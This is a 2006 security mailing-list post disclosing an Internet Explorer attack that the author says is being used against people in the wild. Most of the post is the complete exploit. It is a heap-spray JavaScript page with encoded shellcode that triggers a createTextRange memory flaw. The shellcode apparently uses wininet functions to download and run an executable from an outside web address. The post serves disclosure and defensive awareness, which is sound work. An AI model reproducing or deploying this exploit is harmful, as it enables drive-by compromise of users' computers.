Dailydave mailing list archives

IE attack...

From: Dave Aitel <dave () immunityinc com>
Date: Sat, 25 Mar 2006 11:41:08 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
So this is the IE attack various sites are owning people with...I
stumbled on it while browsing random things. It's been a pretty bad
week for IE this week. Of course, it's been a pretty bad year for IE.
Been a pretty bad time all around for IE. Motto: "Giving Host
Intrusion Prevention vendors case study after case study."

I don't know why the other lists aren't posting this. Maybe there was
a memo that went around where you try to keep people from knowing what
they're actually at risk from.

- -dave

<input type="checkbox" id="blah">
<SCRIPT language="java script">

shellcode = unescape(  
 
"%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a%u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170%u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35%u3130%u203b%u6957%u646e%u776f%u2073%u544e%u3520%u302e%u0029%u6977%u696e%u656e%u2e74%u6c64%u006c%u0000%u0000%u0000%u0000%u0000%u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u4900%u746e%u7265%u656e%u5274%u6165%u4664%u6c69%u0065%u6e49%u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61%u6c64%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u7468%u7074%u2f3a%u772f%u7777%u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e%u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b%u8b30%u0c40%u708b%uad1c%u688b%u5208%u5252%u5252%u5252%u5252%u5252%u5252%u79bb%ue741%u5288%u0068%u0002%ue800%u0191%u0000%u8b5f%u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000%ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852%u0161%u0000%ue85a%u014b%u0000%u4289%u8304%u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00%uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283%u5210%ue850%u0133%u0000%u815a%ue8c2%u0003%u8300%u09c2%u006a%u006a%u006a%u006a%uff52%u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb%u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00%ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8%u0000%u006a%u0068%u0000%u6a80%u6a00%u5200%uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b%u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000%u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b%uc183%u5a0c%u5256%u5151%ue868%u0003%u5200%uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02%u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383%u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056%u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e%u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776%ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7%u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b%uf803%uc681%u03e8%u0000%u09b9%u0000%uf200%u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b%uc783%uc710%u1047%u0044%u0000%u21bb%u05d0%u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8%u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2%uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c%u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0%u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8%u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5%u5b5e%ue0ff");

    bigblock = unescape("%u9090%u9090");
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
        bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000)
        block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ )
        memory[i] = block + shellcode;

    var r = document.getElementById('blah').createTextRange();

</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 
iD8DBQFEJXKktehAhL0gheoRApFMAJkBqhCnj2NTvVZ30sJUhhk/2gwkpgCcChNa
CNw1qWJPIKuPDBFaPZDW47U=
=+Vsq
-----END PGP SIGNATURE-----
Current thread:

IE attack... Dave Aitel (Mar 25)
- RE: IE attack... Anthony Aykut (Mar 25)
- Re: IE attack... Alexander Sotirov (Mar 25)
- Re: IE attack... David Barroso (Mar 25)
- Re: IE attack... str0ke (Mar 25)
- <Possible follow-ups>
- Re: IE attack... Juha-Matti Laurio (Mar 25)